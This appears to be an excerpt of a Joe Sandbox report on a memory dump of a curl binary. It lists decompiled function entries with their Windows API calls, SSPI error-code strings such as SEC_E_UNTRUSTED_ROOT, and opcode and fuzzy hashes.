free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30402C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F304058

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdup$_fstat64freeftell
String ID:
API String ID: 1299477587-0
Opcode ID: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
Instruction ID: 19a046c87a377bf2e7815eea7c299dd83e9deed94e4cccc72b2f919d74f5e2fa
Opcode Fuzzy Hash: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
Instruction Fuzzy Hash: BA51AD72B0674281FB259B21E8147AA66E0B784BD0F55053EEE5E47795EF38CB83C344

Function 000000013F313DF8 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 464stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,00000001,000000013F315142,?,?,?,?,000000013F301404), ref: 000000013F313E9F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,000000013F315142,?,?,?,?,000000013F301404), ref: 000000013F313EBD
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,000000013F315142,?,?,?,?,000000013F301404), ref: 000000013F314018
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,000000013F315142,?,?,?,?,000000013F301404), ref: 000000013F314038
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,000000013F315142,?,?,?,?,000000013F301404), ref: 000000013F314135
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,000000013F315142,?,?,?,?,000000013F301404), ref: 000000013F314179

Strings

%s== Info: %.*s, xrefs: 000000013F313E0A
I64, xrefs: 000000013F313EB3, 000000013F31402B
I32, xrefs: 000000013F313E95, 000000013F31400B

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: strncmp$strtol
String ID: %s== Info: %.*s$I32$I64
API String ID: 1111410017-699021961
Opcode ID: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
Instruction ID: 3d73ddc19e15b061feeb30af8e6a5f640495f62329d5190d2278b6af75d536d9
Opcode Fuzzy Hash: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
Instruction Fuzzy Hash: F602F173E0064085FB28AA29D5A8BFD2AB4F757744F16053ECA4A436A8D739CB57C341

Function 000000013F31EF15 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_UNTRUSTED_ROOT, xrefs: 000000013F31EF15
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNTRUSTED_ROOT
API String ID: 1435330505-3666586070
Opcode ID: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
Instruction ID: a8c36d938b9113cfae5b0c9e3aca82231831cdd2564044b6167a310e394be1c6
Opcode Fuzzy Hash: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
Instruction Fuzzy Hash: 10112736A15A40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EF09 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_UNSUPPORTED_PREAUTH, xrefs: 000000013F31EF09
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_PREAUTH
API String ID: 1435330505-3662181683
Opcode ID: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
Instruction ID: eca013e2ad9471e40ede91a4ffa702c30347c2f189132b672e64ca70cc6cc979
Opcode Fuzzy Hash: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
Instruction Fuzzy Hash: 1D112736A15A40D6E6A5EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EEF1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_UNKNOWN_CREDENTIALS, xrefs: 000000013F31EEF1
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNKNOWN_CREDENTIALS
API String ID: 1435330505-526997280
Opcode ID: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
Instruction ID: 53c3d9c67c3669c1f7bae3971a9a418efdcd16e3e210204984c5fb38d77197e1
Opcode Fuzzy Hash: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
Instruction Fuzzy Hash: 8B112736A15A40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EEFD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_UNSUPPORTED_FUNCTION, xrefs: 000000013F31EEFD
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_FUNCTION
API String ID: 1435330505-1880870521
Opcode ID: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
Instruction ID: fc0e67fdc1ed3d72d042677a73d20d2a56d18ff6ede40389da9defa9c4defe09
Opcode Fuzzy Hash: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
Instruction Fuzzy Hash: FD112736A15A40D6E6A1EF20E4047DD6365F788B91F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EEE5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 000000013F31EEE5
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNFINISHED_CONTEXT_DELETED
API String ID: 1435330505-784520498
Opcode ID: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
Instruction ID: 63183b96c17b6feb3162954507440ff9128f60cfc0bdf59a112986be652158f7
Opcode Fuzzy Hash: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
Instruction Fuzzy Hash: 43112736A15A40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EF21 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 000000013F31EF21
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_WRONG_CREDENTIAL_HANDLE
API String ID: 1435330505-4061164511
Opcode ID: 82fcc0f9178dc25868299476682696be5c2ab5a6d2ad13e042554b6da98a8c51
Instruction ID: 5a177764d27bbfb5123bbbe81aebff6716af69612e0efaf3bb7d023efb6160f8
Opcode Fuzzy Hash: 82fcc0f9178dc25868299476682696be5c2ab5a6d2ad13e042554b6da98a8c51
Instruction Fuzzy Hash: 17112736A15A40D6E6A1EF20E4447DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EF2D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_WRONG_PRINCIPAL, xrefs: 000000013F31EF2D
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_WRONG_PRINCIPAL
API String ID: 1435330505-1246895193
Opcode ID: 0059d72bb7212b7d13cf4b4c99c544965cdbde92f05dc7f542fbb57a277d061b
Instruction ID: 815b19d344668d4049275ef019f2cf3d06a74619a063933c78c7b812249772ff
Opcode Fuzzy Hash: 0059d72bb7212b7d13cf4b4c99c544965cdbde92f05dc7f542fbb57a277d061b
Instruction Fuzzy Hash: CA112736A15A40D6E6A1EF20E4447DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EE19 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_OUT_OF_SEQUENCE, xrefs: 000000013F31EE19
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_OUT_OF_SEQUENCE
API String ID: 1435330505-3748170351
Opcode ID: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
Instruction ID: 9b117babf6cac8864fc35294a85aababa1cdf4b235469d3ac006b68d1653b0c8
Opcode Fuzzy Hash: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
Instruction Fuzzy Hash: 03112A36A15A40D6E661EF20E4047DD7365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE01 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 000000013F31EE01
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_S4U_PROT_SUPPORT
API String ID: 1435330505-839832400
Opcode ID: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
Instruction ID: 6e9061fadeee8f81b23d95e2eba59ddc3847bfc5c06f225a49bbfedc327a88d3
Opcode Fuzzy Hash: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
Instruction Fuzzy Hash: F1112A36A15B40D6E6A1EF20E4047DD7365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE0D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_NO_TGT_REPLY, xrefs: 000000013F31EE0D
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_TGT_REPLY
API String ID: 1435330505-2640736245
Opcode ID: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
Instruction ID: 971d7bb7c0a37bbdba6637eb2f1b2fffe09d4f8bbb62b6928aac9d454e3002bb
Opcode Fuzzy Hash: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
Instruction Fuzzy Hash: 5E112A36A15A40D6E661EF20E4047DD7365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EDF5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_NO_PA_DATA, xrefs: 000000013F31EDF5
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

